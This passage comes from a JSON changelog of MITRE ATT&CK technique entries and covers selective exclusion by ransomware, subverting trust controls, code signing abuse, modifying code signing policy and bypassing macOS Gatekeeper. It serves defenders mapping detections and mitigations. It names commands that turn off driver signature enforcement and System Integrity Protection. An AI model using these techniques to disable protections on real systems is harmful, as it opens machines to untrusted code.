                            "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf"
                        },
                        {
                            "source_name": "Symantec Windows Rootkits",
                            "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.",
                            "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"
                        },
                        {
                            "source_name": "Wikipedia Rootkit",
                            "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.",
                            "url": "https://en.wikipedia.org/wiki/Rootkit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:32:28.874000+00:00\", \"old_value\": \"2025-10-24 17:48:24.032000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0377: Detection of Kernel/User-Level Rootkit Behavior Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--9b00925a-7c4b-4e53-bfc8-9a6a806fde03",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-25 14:45:54.760000+00:00",
                    "modified": "2026-04-15 22:32:31.453000+00:00",
                    "name": "Selective Exclusion",
                    "description": "Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`.(Citation: Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024)  \n\nAdversaries may perform this behavior to avoid alerting users, to evade detection by security tools and analysts, or, in the case of ransomware, to ensure that the system remains operational enough to deliver the ransom notice. \n\nExclusions may target files and components whose corruption would cause instability, break core services, or immediately expose the attack. By carefully avoiding these areas, adversaries maintain system responsiveness while minimizing indicators that could trigger alarms or otherwise inhibit achieving their goals. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1679",
                            "external_id": "T1679"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024",
                            "description": "Anthony Galiette, Doel Santos. (2024, January 11). Medusa Ransomware Turning Your Files into Stone. Retrieved October 15, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:32:31.453000+00:00\", \"old_value\": \"2025-10-22 03:50:30.406000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0897: Detection of Selective Exclusion"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 14:54:07.588000+00:00",
                    "modified": "2026-04-16 20:07:53.101000+00:00",
                    "name": "Subvert Trust Controls",
                    "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553",
                            "external_id": "T1553"
                        },
                        {
                            "source_name": "SpectorOps Subverting Trust Sept 2017",
                            "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.",
                            "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
                        },
                        {
                            "source_name": "Securelist Digital Certificates",
                            "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.",
                            "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"
                        },
                        {
                            "source_name": "Symantec Digital Certificates",
                            "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.",
                            "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.101000+00:00\", \"old_value\": \"2025-10-24 17:49:16.766000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"SpectorOps Code Signing Dec 2017\", \"description\": \"Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.\", \"url\": \"https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions",
                            "M1026: Privileged Account Management",
                            "M1028: Operating System Configuration",
                            "M1038: Execution Prevention",
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0452: Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 16:27:37.784000+00:00",
                    "modified": "2026-04-16 20:07:53.093000+00:00",
                    "name": "Code Signing",
                    "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/002",
                            "external_id": "T1553.002"
                        },
                        {
                            "source_name": "EclecticLightChecksonEXECodeSigning",
                            "description": "Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.",
                            "url": "https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/"
                        },
                        {
                            "source_name": "Securelist Digital Certificates",
                            "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.",
                            "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"
                        },
                        {
                            "source_name": "Symantec Digital Certificates",
                            "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.",
                            "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"
                        },
                        {
                            "source_name": "Wikipedia Code Signing",
                            "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.",
                            "url": "https://en.wikipedia.org/wiki/Code_signing"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.093000+00:00\", \"old_value\": \"2025-10-24 17:48:37.098000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0230: Detect Suspicious or Malicious Code Signing Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-04-23 01:04:57.161000+00:00",
                    "modified": "2026-04-16 20:07:53.034000+00:00",
                    "name": "Code Signing Policy Modification",
                    "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/006",
                            "external_id": "T1553.006"
                        },
                        {
                            "source_name": "Apple Disable SIP",
                            "description": "Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.",
                            "url": "https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection"
                        },
                        {
                            "source_name": "F-Secure BlackEnergy 2014",
                            "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
                            "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf"
                        },
                        {
                            "source_name": "FireEye HIKIT Rootkit Part 2",
                            "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html"
                        },
                        {
                            "source_name": "Microsoft Unsigned Driver Apr 2017",
                            "description": "Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test"
                        },
                        {
                            "source_name": "Microsoft DSE June 2017",
                            "description": "Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN"
                        },
                        {
                            "source_name": "Microsoft TESTSIGNING Feb 2021",
                            "description": "Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option"
                        },
                        {
                            "source_name": "Unit42 AcidBox June 2020",
                            "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.",
                            "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
                        },
                        {
                            "source_name": "GitHub Turla Driver Loader",
                            "description": "TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.",
                            "url": "https://github.com/hfiref0x/TDL"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Abel Morales, Exabeam"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.034000+00:00\", \"old_value\": \"2025-10-24 17:48:48.927000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions",
                            "M1026: Privileged Account Management",
                            "M1046: Boot Integrity"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0523: Detect Code Signing Policy Modification (Windows & macOS)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 16:16:08.471000+00:00",
                    "modified": "2026-04-16 20:07:52.996000+00:00",
                    "name": "Gatekeeper Bypass",
                    "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple\u2019s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute \u2013 Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing \u2013 Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \u201cunauthorized app\u201d and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/001",
                            "external_id": "T1553.001"
                        },
                        {
                            "source_name": "Application Bundle Manipulation Brandon Dalton",
                            "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.",
                            "url": "https://redcanary.com/blog/mac-application-bundles/"
                        },
                        {
                            "source_name": "theevilbit gatekeeper bypass 2021",
                            "description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.",
                            "url": "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/"
                        },
                        {
                            "source_name": "OceanLotus for OS X",
                            "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.",
                            "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"
                        },
                        {
                            "source_name": "TheEclecticLightCompany Quarantine and the flag",
                            "description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.",
                            "url": "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/"
                        },
                        {
                            "source_name": "TheEclecticLightCompany apple notarization ",
                            "description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.",
                            "url": "https://eclecticlight.co/2020/08/28/how-notarization-works/"
                        },
                        {
                            "source_name": "20 macOS Common Tools and Techniques",
                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
                            "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Brandon Dalton @PartyD0lphin",
                        "Swasti Bhushan Deb, IBM India Pvt. Ltd."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.996000+00:00\", \"old_value\": \"2025-10-24 17:48:36.535000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple\\u2019s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\\n\\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\\n\\n1. Checks extended attribute \\u2013 Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\\n\\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\\n\\n3. Code Signing \\u2013 Gatekeeper checks for a valid code signature from an Apple Developer ID.\\n\\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \\u201cunauthorized app\\u201d and the security policy will be modified.\\n\\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\\n\\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).\", \"old_value\": \"Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple\\u2019s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\\n\\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\\n\\n1. Checks extended attribute \\u2013 Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\\n\\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\\n\\n3. Code Signing \\u2013 Gatekeeper checks for a valid code signature from an Apple Developer ID.\\n\\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \\u201cunauthorized app\\u201d and the security policy will be modified.\\n\\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\\n\\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).\", \"diff\": \"--- \\n+++ \\n@@ -10,6 +10,6 @@\\n \\n 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \\u201cunauthorized app\\u201d and the security policy will be modified.\\n \\n-Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\\n+Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for 